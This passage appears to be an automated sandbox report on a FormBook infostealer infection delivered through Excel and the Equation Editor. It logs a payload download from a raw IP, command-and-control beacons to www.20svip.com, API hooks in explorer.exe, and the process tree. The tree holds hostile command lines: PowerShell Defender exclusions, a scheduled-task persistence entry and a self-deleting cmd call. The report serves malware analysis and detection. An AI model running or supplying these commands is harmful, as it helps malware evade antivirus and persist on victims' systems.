0 | 192.168.2.22 | 49165 | 198.23.213.57 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 16:40:50.219563007 CEST | 0 | OUT | GET /ohms.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.23.213.57
Connection: Keep-Alive
May 4, 2021 16:40:50.357841015 CEST | 1 | IN | HTTP/1.1 200 OK
Date: Tue, 04 May 2021 14:40:50 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
Last-Modified: Tue, 04 May 2021 13:26:38 GMT
ETag: "b3600-5c18107215abc"
Accept-Ranges: bytes
Content-Length: 734720
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 43.226.23.112 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 16:41:55.450345993 CEST | 774 | OUT | GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
Host: www.20svip.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 4, 2021 16:41:56.283168077 CEST | 774 | OUT | GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
Host: www.20svip.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 4, 2021 16:41:57.968192101 CEST | 774 | OUT | GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
Host: www.20svip.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 4, 2021 16:42:01.338042021 CEST | 774 | OUT | GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
Host: www.20svip.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 4, 2021 16:42:04.709716082 CEST | 774 | OUT | GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
Host: www.20svip.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 4, 2021 16:42:08.077815056 CEST | 775 | OUT | GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
Host: www.20svip.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 4, 2021 16:42:14.802071095 CEST | 775 | OUT | GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
Host: www.20svip.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 4, 2021 16:42:28.250493050 CEST | 775 | OUT | GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
Host: www.20svip.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


                                            Code Manipulations

                                            User Modules

                                            Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                            Processes

                                            Process: explorer.exe, Module: USER32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEA
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEA
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEA
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEA

                                            Statistics

                                            Behavior

                                            System Behavior

                                            General

                                            Start time:16:40:37
                                            Start date:04/05/2021
                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                            Imagebase:0x13f4b0000
                                            File size:27641504 bytes
                                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:16:40:58
                                            Start date:04/05/2021
                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                            Imagebase:0x400000
                                            File size:543304 bytes
                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:16:41:01
                                            Start date:04/05/2021
                                            Path:C:\Users\Public\vbc.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\Public\vbc.exe'
                                            Imagebase:0xa00000
                                            File size:734720 bytes
                                            MD5 hash:BA01DF16E4C876E078348FD4479A8FDF
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            Reputation:low

                                            General

                                            Start time:16:41:03
                                            Start date:04/05/2021
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe'
                                            Imagebase:0x22100000
                                            File size:452608 bytes
                                            MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Reputation:high

                                            General

                                            Start time:16:41:04
                                            Start date:04/05/2021
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
                                            Imagebase:0x22100000
                                            File size:452608 bytes
                                            MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Reputation:high

                                            General

                                            Start time:16:41:04
                                            Start date:04/05/2021
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp4D08.tmp'
                                            Imagebase:0xe30000
                                            File size:179712 bytes
                                            MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:16:41:07
                                            Start date:04/05/2021
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
                                            Imagebase:0x22100000
                                            File size:452608 bytes
                                            MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Reputation:high

                                            General

                                            Start time:16:41:09
                                            Start date:04/05/2021
                                            Path:C:\Users\Public\vbc.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\Public\vbc.exe
                                            Imagebase:0xa00000
                                            File size:734720 bytes
                                            MD5 hash:BA01DF16E4C876E078348FD4479A8FDF
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:16:41:12
                                            Start date:04/05/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:
                                            Imagebase:0xffca0000
                                            File size:3229696 bytes
                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:16:41:23
                                            Start date:04/05/2021
                                            Path:C:\Windows\SysWOW64\cmmon32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                            Imagebase:0x340000
                                            File size:43008 bytes
                                            MD5 hash:EA7BAAB0792C846DE451001FAE0FBD5F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:16:41:29
                                            Start date:04/05/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\Public\vbc.exe'
                                            Imagebase:0x49d20000
                                            File size:302592 bytes
                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis
